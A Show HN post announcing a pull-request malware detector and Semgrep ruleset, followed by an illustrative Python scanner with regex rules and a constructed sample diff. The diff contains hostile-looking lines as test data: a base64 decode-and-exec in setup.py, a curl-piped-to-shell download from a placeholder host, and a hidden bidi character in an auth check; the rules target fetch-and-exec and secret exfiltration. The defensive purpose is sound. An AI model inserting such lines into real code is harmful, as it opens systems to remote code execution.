Show HN: I built a PR listener and ruleset to detect malicious code in CI/CD

I built a GitHub app that detects it in pull requests and notifies or blocks them. Alongside it, I published a Semgrep ruleset for any stage of the CI/CD.

I started this after getting frustrated by all the FUD around malicious code - lots of noise, little effort to solve it. Having said that, it's still a major attack vector - a stored RCE, with the codebase itself as the sink.

Feedback is appreciated.

The app, PRevent: https://ift.tt/UXw5gAu
The ruleset: https://ift.tt/rKYFkP7
The research: https://ift.tt/KoSCWZz...

February 26, 2025 at 12:52AM
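The detection step the post describes (look at what a pull request adds, then notify or block) can be sketched in a few dozen lines. The following is an added example, not PRevent's code or its Semgrep ruleset: the indicator regexes, the sample diff, the file paths in it and the block-versus-notify split are all assumptions chosen for illustration. It parses a unified diff, runs each indicator over the added lines only (so removing a suspicious line never fires), and flags Unicode bidi controls of the kind that make reviewed source differ from executed source.

```python
"""Illustrative scanner for suspicious additions in a unified diff.

Added example, not PRevent's code or its Semgrep ruleset. The indicator
regexes, the sample diff and the block/notify split are assumptions chosen
for illustration; a real ruleset is broader and parses code, not lines.
"""
import re
from dataclasses import dataclass
from typing import Iterator, List, Tuple

# Indicator rules: (rule id, regex applied to the content of one added line).
INDICATORS = [
    # exec()/eval() fed straight from a decoder: the payload is hidden from review
    ("decode-then-exec", re.compile(
        r"\b(?:exec|eval)\s*\(\s*(?:base64\.)?b64decode|"
        r"\b(?:exec|eval)\s*\(\s*(?:bytes\.fromhex|codecs\.decode|zlib\.decompress)")),
    # download piped into a shell, or exec() of an HTTP response body
    ("fetch-then-exec", re.compile(
        r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b|"
        r"\b(?:exec|eval)\s*\(\s*(?:urllib\.request\.)?urlopen\(|"
        r"\b(?:exec|eval)\s*\(\s*requests\.get\(")),
    # CI secrets (the environment) handed to a network call on the same line
    ("env-exfil", re.compile(
        r"\bos\.environ\b.*\b(?:requests\.post|urlopen|socket)\b|"
        r"\b(?:requests\.post|urlopen)\(.*\bos\.environ\b")),
]

# Unicode controls that make source render differently from how it executes.
BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")
INVISIBLE = set("\u200b\u200c\u200d\u2060\ufeff")

# Rules confident enough to block the PR outright; anything else only notifies.
BLOCK_RULES = frozenset({"decode-then-exec", "fetch-then-exec", "bidi-control-char"})


@dataclass(frozen=True)
class Finding:
    rule: str
    path: str
    line: int  # line number in the post-change file
    text: str


def added_lines(diff: str) -> Iterator[Tuple[str, int, str]]:
    """Yield (path, new-file line number, content) for every '+' line in a unified diff."""
    path, new_line, in_hunk = "", 0, False
    for raw in diff.splitlines():
        if raw.startswith("diff "):
            in_hunk = False                      # a new file header follows
        elif not in_hunk and raw.startswith("+++ "):
            path = raw[4:].strip()
            path = path[2:] if path.startswith("b/") else path
        elif raw.startswith("@@"):
            in_hunk = True
            m = re.match(r"@@ -\d+(?:,\d+)? \+(\d+)", raw)
            new_line = int(m.group(1)) if m else 1
        elif in_hunk and raw.startswith("+"):
            yield path, new_line, raw[1:]
            new_line += 1
        elif in_hunk and raw.startswith(" "):
            new_line += 1                        # context line: present in the new file
        # '-' lines and '\ No newline at end of file' do not advance the new-file counter


def scan_diff(diff: str) -> List[Finding]:
    """Run every indicator over each added line; return findings in diff order."""
    findings: List[Finding] = []
    for path, line_no, text in added_lines(diff):
        for rule, rx in INDICATORS:
            if rx.search(text):
                findings.append(Finding(rule, path, line_no, text.strip()))
        chars = set(text)
        if chars & BIDI_CONTROLS:
            findings.append(Finding("bidi-control-char", path, line_no, text.strip()))
        elif chars & INVISIBLE:
            findings.append(Finding("invisible-char", path, line_no, text.strip()))
    return findings


def decide(findings: List[Finding]) -> str:
    """'pass', 'notify' or 'block': the action a PR check would take."""
    if not findings:
        return "pass"
    return "block" if any(f.rule in BLOCK_RULES for f in findings) else "notify"


# Constructed sample diff (hypothetical repository and paths, not a real PR).
SAMPLE_DIFF = """\
diff --git a/setup.py b/setup.py
--- a/setup.py
+++ b/setup.py
@@ -1,2 +1,5 @@
 from setuptools import setup
+import base64
+# harmless-looking helper
+exec(base64.b64decode("aW1wb3J0IG9z"))
 setup(name="demo")
diff --git a/scripts/ci.sh b/scripts/ci.sh
--- a/scripts/ci.sh
+++ b/scripts/ci.sh
@@ -1,2 +1,3 @@
 #!/bin/sh
+curl -fsSL https://example.invalid/x.sh | sh
 echo done
diff --git a/src/auth.js b/src/auth.js
--- a/src/auth.js
+++ b/src/auth.js
@@ -10,2 +10,3 @@
 function isAdmin(user) {
+  if (user.role === "admin" /*\u202e */ ) { return true; }
 }
"""

if __name__ == "__main__":
    for f in scan_diff(SAMPLE_DIFF):
        print(f"{f.rule:20} {f.path}:{f.line}  {f.text!r}")
    print("decision:", decide(scan_diff(SAMPLE_DIFF)))
```

Two design points worth noting. Scanning only added lines is what keeps the check cheap and keeps it from re-reporting code that was already in the repository; the trade-off is that a payload split across several innocuous-looking lines, or assembled at runtime, will not match a line-level regex, which is exactly why a syntax-aware tool such as Semgrep is the better fit for the real rules. The `decide` split mirrors the notify-or-block choice from the post: only high-confidence indicators block, so a noisy rule like `env-exfil` degrades to a notification instead of stalling every PR that touches both `os.environ` and an HTTP client.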